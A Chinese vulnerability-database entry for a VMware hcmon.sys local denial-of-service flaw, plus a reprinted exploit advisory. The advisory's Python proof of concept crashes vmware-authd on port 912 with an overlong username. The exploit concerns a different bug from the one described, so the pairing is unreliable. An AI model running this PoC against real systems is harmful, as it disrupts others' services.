VMWare Workstation hcmon.sys驱动本地拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117185 漏洞类型 资源管理错误
发布时间 2009-01-02 更新时间 2009-01-23
CVE编号 CVE-2009-0177 CNNVD-ID CNNVD-200901-229
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7647
https://www.securityfocus.com/bid/33095
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-229
|漏洞详情
VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统。VMWare的hcmon.sys驱动没有过滤用户态通过METHOD_NEITHER发送的指针:.text:00011606loc_11606:.text:00011606moveax,[ebp+SystemBuffer].text:00011609mov[ebp+SystemBuffer2],eax.text:0001160Cmovecx,[ebp+SystemBuffer2].text:0001160Fmovedx,[ecx+0Ch]<----BUGCHECK.text:00011612cmpedx,[ebp+var_20].text:00011615jnzshortloc_11629.text:00011617cmp[ebp+NumberOfBytes],70h.text:0001161Bjbshortloc_11629.text:0001161Dmoveax,[ebp+SystemBuffer2].text:00011620cmpdwordptr[eax+8],7FFBh.text:00011627jbeshortloc_11638如果本地用户向\\.\hcmon设备发送了0x8101232BIOCTL,就可以导致内核崩溃。
|漏洞EXP
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Vmware <= 2.5.1 build-126130 Remote Denial of Service

Application: Vmware

Web Site: http://www.vmware.com/

Platform: Windows *

Bug: Remote Denial of Service

Tested agains: Vmware player 2.5.1 build-126130, workstation 2.5.1 build-126130, using Windows XP SP3 fully patched

-------------------------------------------------------

1) Introduction

2) Bug

3) Proof of concept

4) Credits

================

1) Introduction

================

"VMware desktop virtualization technology lets you run multiple operating systems on a single physical computer.
Easily run Windows applications on your Mac, including high end games and other graphic applications, 
with VMware Fusion. Run Windows and Linux applications on Windows or Linux PCs with the free VMware Player."

=======

2) Bug

=======
Vmware-authd listen on 0.0.0.0 port 912 on a windows box by default.
A denial of service exist in the module vmwarebase.dll of the system process vmware-authd.exe when a long username
or password is supplied to the service, code execution doesn't look possible at this time.
A dump file will be created here: C:\Documents and Settings\LocalService\Application Data\VMware\vmware-authd-*.dmp
Also some old version of this binary (like 6.00.3938.0000) doesn't seems vulnerable to this DoS.
==================

3)Proof of concept

==================
Auth-dos.py :

import struct
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buff = 'A' * 350
target = '192.168.0.102'
port = 912
s.connect((target, port))
data = s.recv(1024)
s.send('USER '+buff+'\r\n')
data = s.recv(1024)
s.send('PASS yo \r\n')
data = s.recv(1024)
print " [+] sending dummy payload"
s.close()
print " [+] done! "

=====

4)Credits

=====

laurent gaffié

laurent.gaffie{remove_this}[at]gmail[dot]com

# milw0rm.com [2009-01-02]
|受影响的产品
VMWare Workstation 5.5.4 VMWare Player 2.5.1
|参考资料

来源:www.vmware.com
链接:http://www.vmware.com/security/advisories/VMSA-2009-0005.html
来源:VUPEN
名称:ADV-2009-0024
链接:http://www.frsirt.com/english/advisories/2009/0024
来源:FULLDISC
名称:20090403VMSA-2009-0005VMwareHostedproducts,VIClientandpatchesforESXandESXiresolvemultiplesecurityissues
链接:http://seclists.org/fulldisclosure/2009/Apr/0036.html
来源:MLIST
名称:[security-announce]20090403VMSA-2009-0005VMwareHostedproducts,VIClientandpatchesforESXandESXiresolvemultiplesecurityissues
链接:http://lists.vmware.com/pipermail/security-announce/2009/000054.html
来源:VUPEN
名称:ADV-2009-0944
链接:http://www.vupen.com/english/advisories/2009/0944
来源:SECTRACK
名称:1021512
链接:http://www.securitytracker.com/id?1021512
来源:BID
名称:34373
链接:http://www.securityfocus.com/bid/34373
来源:SECUNIA
名称:34601
链接:http://secunia.com/advisories/34601
来源:SECUNIA
名称:33372
链接:http://secunia.com/advisories/33372
来源:OSVDB
名称:51180
链接:http://osvdb.org/51180
来源:MILW0RM
名称:7647
链接:http://milw0rm.com/exploits/7647